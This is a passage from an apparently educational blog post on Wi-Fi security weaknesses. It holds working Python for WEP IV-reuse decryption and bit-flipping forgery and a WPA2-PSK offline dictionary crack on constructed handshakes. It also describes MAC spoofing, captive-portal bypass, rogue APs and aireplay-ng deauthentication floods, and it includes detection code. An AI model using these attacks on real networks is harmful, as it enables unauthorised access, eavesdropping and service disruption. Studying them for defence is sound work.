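    data, icv = pt[:-4], pt[-4:]
    return data, zlib.crc32(data).to_bytes(4, "little") == icv


def keystream_from_known_plaintext(body: bytes, known: bytes) -> bytes:
    """IV reuse, step 1: a frame whose plaintext is known gives
    ciphertext XOR (plaintext || ICV) = keystream for that IV."""
    return xor(body[3:], known + zlib.crc32(known).to_bytes(4, "little"))


def decrypt_with_keystream(body: bytes, keystream: bytes) -> bytes:
    """IV reuse, step 2: any other frame sent under the same IV and key uses the
    same keystream, so it decrypts without the key (ICV stripped)."""
    ct = body[3:]
    if len(keystream) < len(ct):
        raise ValueError("recovered keystream shorter than target frame")
    return xor(ct, keystream)[:-4]


def flip_bits(body: bytes, delta: bytes) -> bytes:
    """CRC-32 is affine: crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros of len(p)).
    XOR `delta` into the encrypted data and patch the encrypted ICV with
    crc(delta) ^ crc(zeros): the forged frame still passes the integrity check."""
    iv, ct = body[:3], body[3:]
    data_ct, icv_ct = ct[:-4], ct[-4:]
    if len(delta) != len(data_ct):
        raise ValueError("delta must cover the whole data field")
    icv_delta = zlib.crc32(delta) ^ zlib.crc32(bytes(len(delta)))
    return iv + xor(data_ct, delta) + xor(icv_ct, icv_delta.to_bytes(4, "little"))


def iv_collision_probability(packets: int, iv_bits: int = 24) -> float:
    """Birthday bound: P(at least one repeated IV among `packets` random IVs).
    For a 24-bit IV this crosses 0.5 at about 4,800 packets."""
    return 1.0 - exp(-packets * (packets - 1) / (2.0 * 2 ** iv_bits))


def demo():
    key = b"\x01\x02\x03\x04\x05"                    # constructed 40-bit key
    iv = b"\x0a\x0b\x0c"                             # the same IV used for two frames
    snap = b"\xaa\xaa\x03\x00\x00\x00"                # LLC/SNAP header, identical in every frame
    arp = snap + b"\x08\x06" + b"ARP-request-body"    # frame whose content the attacker can guess
    secret = snap + b"\x08\x00" + b"secret"           # frame the attacker wants to read and alter
    f_arp, f_secret = wep_encrypt(key, iv, arp), wep_encrypt(key, iv, secret)
    ks = keystream_from_known_plaintext(f_arp, arp)
    recovered = decrypt_with_keystream(f_secret, ks)
    forged = flip_bits(f_secret, bytes(len(secret) - 6) + b"\x20" * 6)   # 'secret' -> 'SECRET'
    return recovered, wep_decrypt(key, forged)


if __name__ == "__main__":
    print(demo())
```

Real attacks do not wait for a collision to read one packet; aircrack-ng's statistical attacks use the many captured IVs to recover the key. The example shows why the design fails at all: the IV is too short to avoid reuse and the ICV is not keyed.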
The attack above takes a fair amount of time and packets; to shorten it, attackers usually perform traffic injection. Traffic injection is most often done by capturing an ARP packet and replaying it to the access point, so that the AP keeps answering with freshly encrypted packets and IVs are collected far faster. Unlike the passive attacks above, traffic injection requires a wireless card with specific hardware and software that is rarely found in shops: the right chipset, firmware version and driver version, and it is not uncommon to have to patch drivers and applications.
The application used to capture the packets is airodump (airodump-ng). The following screenshot shows airodump capturing WLAN packets. After enough data has been captured, the cracking process is run to find the WEP key. The application used to break WEP encryption is aircrack (aircrack-ng). The following screenshot shows aircrack successfully finding the WEP key.
4. WPA-PSK or WPA2-PSK
WPA is an interim security technology created to replace WEP (WPA2 is its successor, based on the full IEEE 802.11i standard). There are two modes: personal (WPA-PSK) and enterprise (WPA-RADIUS, using 802.1X). WPA-PSK can already be cracked by an offline brute-force/dictionary attack: the attacker captures the four-way handshake between a client and the AP, then tries words from a dictionary one after another against it, with no further contact with the network. This attack succeeds if the passphrase used on the wireless network is in the attacker's dictionary. To prevent such attacks on WPA-PSK security, use a passphrase that is long enough (a whole sentence). A non-default SSID also helps, because the key is derived from the passphrase together with the SSID, so precomputed tables for common SSIDs do not apply.
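Here is what "offline" means in practice, as an added example (not from the original page): the WPA2-PSK key derivation and the MIC check an attacker runs against a captured handshake, using only the standard library. The handshake (MAC addresses, nonces, the EAPOL message 2 frame) is constructed below rather than taken from a capture; with a real pcap, the same five values would be read from the beacon and the first two handshake frames.

```python
"""Added example (not from the original page): offline dictionary attack on a
WPA2-PSK four-way handshake. The handshake is constructed here for the demo."""
import hashlib
import hmac

MIC_OFF = 81   # EAPOL header (4) + descriptor type, key info, key length, replay
               # counter, nonce, key IV, RSC, key ID (77) => MIC field at bytes 81..97


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the salt, which is why rainbow tables only cover common SSIDs."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512: four HMAC-SHA1 blocks over 'Pairwise key expansion' || 0 || data || i.
    Everything except the PMK is sent in clear in the handshake."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                            hashlib.sha1).digest() for i in range(4))
    return out[:64]   # KCK = PTK[0:16] authenticates the EAPOL-Key frames


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 / key descriptor version 2: MIC = HMAC-SHA1 over the frame with the
    16-byte MIC field zeroed, truncated to 16 bytes."""
    zeroed = eapol_frame[:MIC_OFF] + bytes(16) + eapol_frame[MIC_OFF + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, key_data: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 with a zeroed MIC.
    key info 0x010a = pairwise | MIC present | descriptor version 2 (CCMP)."""
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x00" + (1).to_bytes(8, "big") + snonce
            + bytes(16) + bytes(8) + bytes(8) + bytes(16)
            + len(key_data).to_bytes(2, "big") + key_data)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame, wordlist):
    """Try each candidate passphrase against the captured MIC; return the hit or None.
    Nothing here touches the network: one PBKDF2 per word is the entire cost."""
    captured_mic = eapol_frame[MIC_OFF:MIC_OFF + 16]
    for word in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(word, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return word
    return None


def constructed_handshake(passphrase: str, ssid: str):
    """Play the client side once with the real passphrase to produce a 'captured' frame.
    MAC addresses and nonces are constructed values, not from any real network."""
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce = hashlib.sha256(b"anonce-demo").digest()
    snonce = hashlib.sha256(b"snonce-demo").digest()
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # RSN IE: CCMP, PSK
    frame = build_msg2(snonce, rsn_ie)
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    frame = frame[:MIC_OFF] + eapol_mic(kck, frame) + frame[MIC_OFF + 16:]
    return ap_mac, sta_mac, anonce, snonce, frame


if __name__ == "__main__":
    ap, sta, an, sn, msg2 = constructed_handshake("correct horse battery", "TestNet")
    print(crack_psk("TestNet", ap, sta, an, sn, msg2, ["password", "12345678", "correct horse battery"]))
```

The cost per guess is fixed at 4096 HMAC-SHA1 iterations, so the only defence on the network side is a passphrase that is not in any wordlist; the test with a different SSID shows why a unique SSID also defeats precomputed tables.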
5. MAC Filter
Almost every wireless access point or router offers MAC filtering as a security feature. In practice it does little to secure wireless communications, because a MAC address is very easy to spoof or change: ifconfig or macchanger on Linux/Unix, or tools such as regedit, SMAC or MAC Makeup on Windows, change it with ease. Wi-Fi networks in offices and even at ISPs (typically the ones used by cafes) are still often found protected by MAC filtering alone. Using wardriving applications such as Kismet, KisMAC or the aircrack tools, the MAC address of every client connected to an access point can be obtained. With that information we can connect to the access point after changing our MAC address to match one of those clients. On a wireless network a duplicated MAC address does not cause an association conflict; the attacker's client only needs a different IP address (it is cleaner still to wait until the legitimate client has disconnected). Below is a list of client MAC addresses connected to an access point, obtained with Kismet. To change the MAC address of a network interface, a simple tool such as MAC Makeup is enough.
6. Captive Portal
Captive portals have become a popular mechanism for community infrastructure and Wi-Fi hotspot services: they provide user authentication for the infrastructure and IP flow management, such as traffic shaping and bandwidth control, without any special application having to be installed on the user's computer. Authentication can be performed securely through an ordinary web browser on the user's side. Captive portals also have the potential to let us do things securely via SSL and IPsec, and to set quality-of-service (QoS) rules per user, while the network keeps the open nature of Wi-Fi infrastructure.
A captive portal is actually a router or gateway machine that protects the network by not allowing any traffic through until the user has registered/authenticated. Here is how a captive portal works:
• A user with a wireless client is allowed to associate with the wireless network and obtain an IP address (DHCP)
• All traffic is blocked except traffic towards the captive portal (registration / web-based authentication), which is located on the wired network
• All web traffic is redirected to the captive portal
• After the user has registered or logged in, access to the network (Internet) is allowed
Below is an example of a captive portal login page.
One thing to note is that the captive portal only tracks client connections by IP and MAC address after authentication. This makes it possible to use the captive portal without authenticating, because both the IP and the MAC address can be spoofed. The attack is carried out by IP and MAC spoofing: MAC address spoofing as described earlier, while IP spoofing takes a little more effort, using ARP cache poisoning to redirect the traffic of a client that has already authenticated.
Another attack that is easy enough is a rogue AP: an access point configured with the same details as the target AP, from the SSID and BSSID down to the channel used. When a client connects to the AP we have set up, we can forward its traffic to the real AP and see everything that passes in between.
It is not rare for a captive portal built on a hotspot to have a weakness in its network configuration or design: for example, authentication still uses plaintext HTTP, network management can be reached over the wireless (it sits on the same network), and so on. Another weakness of the captive portal is that the data traffic after authentication (once connected to the network) is still sent unencrypted, so it is easily intercepted by an attacker. We therefore need to be careful when connecting to a hotspot network, and should use secure communication protocols such as HTTPS, POP3S, SSH, IMAPS, etc.
7. Wardrive
Wardriving is an electronic fishing expedition to find weak wireless networks. Most of these wireless networks are not even protected by a password or encryption. The activity is carried out to look for networks that can become targets, so that we can then attack the wireless networks we have chosen. Only simple equipment is needed. It is generally done to get an Internet connection, but many do it for other purposes, ranging from curiosity, trying things out, research and lab work to crime.
Application for site survey / wardriving: NetStumbler 0.4.0
The first step in attempting to exploit a wireless network is finding the access point. A tool for this is NetStumbler, which makes it easy to find wireless network signals. It also measures the signal strength and the noise level, which indicate how good a connection to a given access point would be.
Results of scanning and analysing the WLAN networks around the student boarding houses at IT Telkom using NetStumbler (screenshot).
Signal graph obtained with this tool for the SSID "ITTelkom" (screenshot).
8. Protocol Weaknesses in Wireless Networks
The weaknesses of wireless networks cannot be separated from weaknesses in the various protocols used, including:
8.1 EAPOL (Extensible Authentication Protocol over LAN)
EAPOL (EAP over LAN, part of IEEE 802.1X) is the protocol commonly used to carry authentication between a client and the AP, both for EAP exchanges and for the WPA/WPA2 four-way handshake. The legitimate client sends EAPOL frames to the AP, the AP receives them and responds, and at the end of the exchange the AP has authorized the client. The gap in EAPOL is that these frames travel in clear and can be captured to obtain the authentication values exchanged (the nonces and MIC of the handshake are exactly what an offline dictionary attack needs).
However, the authentication values appear only at the start of the legitimate client's communication with the AP. Once the client is connected, EAPOL frames do not appear again until the next rekey (the original puts this at roughly every ten thousand packets). An attacker can inject forged EAPOL frames whose addresses have been matched to the target: the SSID, and the source/destination MAC and IP addresses.
The legitimate client sends EAPOL frames to get a response from the AP for the authentication process, and the AP checks the client's credentials (its "ID card"). The attacker abuses the protocol by forging such frames with the client's addresses so that the AP treats them as the client's own. Note the limit of this: handshake messages carry a MIC keyed from the PMK, so they cannot be forged without the passphrase; what can be forged are the unauthenticated EAPOL-Start and EAPOL-Logoff frames, with which an attacker can, for example, log the legitimate client off or force it to re-authenticate.
8.2 Beacon Management
Beacon management frames are used by every AP to announce its presence over RF. Capturing and decoding beacon frames shows that, at each transmission interval, a beacon carries information such as the SSID, the encryption type (security capabilities), the channel, the MAC address (BSSID), the supported rates and so on.
The weakness that can be exploited in this frame type is as follows. An attacker captures the beacon frames transmitted by the AP and then retransmits them. Typically an AP emits a beacon every 100 ms. If the attacker captures the AP's beacon and re-emits it, the two beacons are identical: the senders are different, but the contents are the same. This means there are two APs carrying the same SSID and the same MAC address (BSSID). As a result clients can no longer communicate properly with the real AP until the attacker stops sending the cloned beacons. Beacons carry no authentication, so nothing on the client side can tell the two sources apart.
8.3 Deauthentication / Disassociation Protocol
The usual name for exploiting this gap is the Deauthentication Broadcast Attack. The attack floods the WLAN with deauthentication frames, so that wireless service for the clients breaks down. It is the most dangerous attack of this kind because it breaks the connection of the target client, or of every client associated with the AP: the attacker sends a disconnection request in the AP's name (or the client's), and because Deauthentication/Disassociation frames are management frames that the AP and the clients honour directly, without any authentication, the request is obeyed. If an ISP were hit by this attack there would be many customer complaints, because the entire client network is cut off. The standard countermeasure is Protected Management Frames (IEEE 802.11w), which authenticate these frames, but it only helps when both the AP and the clients support it.
The application used for this attack is aireplay (aireplay-ng from the aircrack-ng suite). The following screenshot shows aircrack-ng performing a broadcast deauthentication attack.
8.4 RF Signal Jamming
RF signals are electromagnetic waves used to exchange information over the air from one node to another. RF signals are widely used today, for example to transmit FM radio and television, or as a means of sending data over wireless networks.
RF signals have advantages but also weaknesses. They are easily disturbed by other external RF-based systems such as cordless phones, microwave ovens, Bluetooth devices and others. When these devices are used at the same time, the performance of the wireless network can drop significantly because of competition for the same medium. In the end, such interference causes bit errors in the information being sent, leading to retransmissions and delay for the user. An attacker can produce the same effect deliberately with a jammer on the channel in use, and 802.11 has no defence against it beyond moving to another channel or band.
8.5 Probe-Request Management
When a client first tries to connect to an AP, it sends a probe request and the AP answers with a probe response, which lets the client check whether the wireless network it wants to join is present and will accept it. The gap an attacker can use is to manipulate this probe request/response exchange: the attacker generates probe requests as fast as possible, for example 500 packets per second, and the AP cannot keep up with answering so many frames. This means the AP is no longer able to serve its other clients.
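The management frames discussed in section 2 (hidden SSID) and sections 8.2 and 8.3 (beacons, deauthentication) all share the same 24-byte 802.11 header and tagged information elements, so one parser serves both. The following is an added example, not code from the original page: a minimal management-frame parser, used first to recover a hidden SSID from the probe response the AP sends to a joining client, and then to flag a deauthentication flood and replayed beacons in a capture. The capture is constructed inline (the MAC addresses, SSID and timings are made up); with a real capture the frames would come from a monitor-mode interface via Kismet, airodump-ng or a pcap, and a detector like this is the core of what a wireless IDS such as Kismet alerts on.

```python
"""Added example (not from the original page): minimal IEEE 802.11 management
frame parser, hidden-SSID recovery, and deauth-flood / beacon-replay detection
over a constructed capture. Standard library only."""
import struct
from collections import defaultdict

SUBTYPES = {0: "assoc_req", 4: "probe_req", 5: "probe_resp", 8: "beacon",
            10: "disassoc", 12: "deauth"}
# fixed fields that precede the tagged IEs in each body
FIXED_LEN = {"beacon": 12, "probe_resp": 12, "assoc_req": 4, "deauth": 2, "disassoc": 2}


def parse_mgmt(frame: bytes) -> dict:
    """Decode the 24-byte MAC header and the tagged information elements."""
    fc = struct.unpack_from("<H", frame, 0)[0]
    if (fc >> 2) & 0x3 != 0:
        raise ValueError("not a management frame")
    name = SUBTYPES.get((fc >> 4) & 0xF, "other")
    d = {"subtype": name, "da": frame[4:10].hex(":"), "sa": frame[10:16].hex(":"),
         "bssid": frame[16:22].hex(":"), "seq": struct.unpack_from("<H", frame, 22)[0] >> 4}
    if name in ("deauth", "disassoc"):
        d["reason"] = struct.unpack_from("<H", frame, 24)[0]
    body, pos = frame[24 + FIXED_LEN.get(name, 0):], 0
    while pos + 2 <= len(body):                  # IE = id, length, value
        eid, ln = body[pos], body[pos + 1]
        if eid == 0:                             # element 0 is the SSID
            d["ssid"] = body[pos + 2:pos + 2 + ln].decode("utf-8", "replace")
        pos += 2 + ln
    return d


def mgmt_frame(subtype: int, da: bytes, sa: bytes, bssid: bytes, seq: int, body: bytes) -> bytes:
    """Build a management frame (type 0, no flags) for the constructed capture."""
    return struct.pack("<HH", subtype << 4, 0) + da + sa + bssid + struct.pack("<H", seq << 4) + body


def ssid_ie(ssid: bytes) -> bytes:
    return bytes([0, len(ssid)]) + ssid


def reveal_hidden_ssids(frames) -> dict:
    """BSSID -> SSID. A hidden network's beacon carries an empty SSID IE, but the
    probe response the AP sends a joining client (and the client's association
    request) still carry the name in clear, so a capture gives it away."""
    ssids = {}
    for f in map(parse_mgmt, frames):
        if f["subtype"] == "beacon":
            ssids.setdefault(f["bssid"], f.get("ssid") or None)
        elif f["subtype"] in ("probe_resp", "assoc_req") and f.get("ssid"):
            ssids[f["bssid"]] = f["ssid"]
    return ssids


def detect_deauth_flood(timed_frames, window=1.0, threshold=10) -> dict:
    """timed_frames: (seconds, frame) pairs. Returns BSSIDs whose deauth/disassoc count
    exceeds `threshold` inside any `window`-second sliding window, with the peak count."""
    times = defaultdict(list)
    for t, fr in timed_frames:
        f = parse_mgmt(fr)
        if f["subtype"] in ("deauth", "disassoc"):
            times[f["bssid"]].append(t)
    flagged = {}
    for bssid, ts in times.items():
        ts.sort()
        start = 0
        for end in range(len(ts)):
            while ts[end] - ts[start] > window:
                start += 1
            if end - start + 1 > threshold:
                flagged[bssid] = max(flagged.get(bssid, 0), end - start + 1)
    return flagged


def detect_replayed_beacons(frames) -> set:
    """A real AP increments the sequence number of every beacon; an attacker who
    captures and re-emits beacons repeats it. (Sequence numbers wrap at 4096, so a
    long capture should also bound the comparison by time.)"""
    seen, replayed = defaultdict(set), set()
    for f in map(parse_mgmt, frames):
        if f["subtype"] == "beacon":
            if f["seq"] in seen[f["bssid"]]:
                replayed.add(f["bssid"])
            seen[f["bssid"]].add(f["seq"])
    return replayed


def constructed_capture():
    """(seconds, frame) list: a hidden AP, one client joining, a replayed beacon, a deauth flood."""
    ap, sta, bcast = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb"), b"\xff" * 6
    beacon_fixed = bytes(8) + struct.pack("<HH", 100, 0x0411)   # timestamp, 100 TU interval, capabilities
    cap = [(0.000, mgmt_frame(8, bcast, ap, ap, 1, beacon_fixed + ssid_ie(b""))),           # hidden SSID
           (0.020, mgmt_frame(4, bcast, sta, bcast, 7, ssid_ie(b"SecretNet"))),            # client probes by name
           (0.021, mgmt_frame(5, sta, ap, ap, 2, beacon_fixed + ssid_ie(b"SecretNet"))),   # AP answers in clear
           (0.102, mgmt_frame(8, bcast, ap, ap, 3, beacon_fixed + ssid_ie(b""))),
           (0.103, mgmt_frame(8, bcast, ap, ap, 3, beacon_fixed + ssid_ie(b"")))]          # attacker's replay
    cap += [(0.200 + i * 0.005, mgmt_frame(12, bcast, ap, ap, 100 + i, struct.pack("<H", 7)))
            for i in range(64)]                                                             # broadcast deauths
    return cap


if __name__ == "__main__":
    capture = constructed_capture()
    frames = [fr for _, fr in capture]
    print(reveal_hidden_ssids(frames), detect_replayed_beacons(frames), detect_deauth_flood(capture))
```

The deauth threshold (more than 10 per second from one BSSID) is a starting point; a busy AP legitimately sends a few deauths a minute, a broadcast flood sends hundreds a second, and on a network with 802.11w enabled the flood should simply not dissociate anyone, which the same counter can confirm.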
Posted 2/26/2010 04:19:00 PM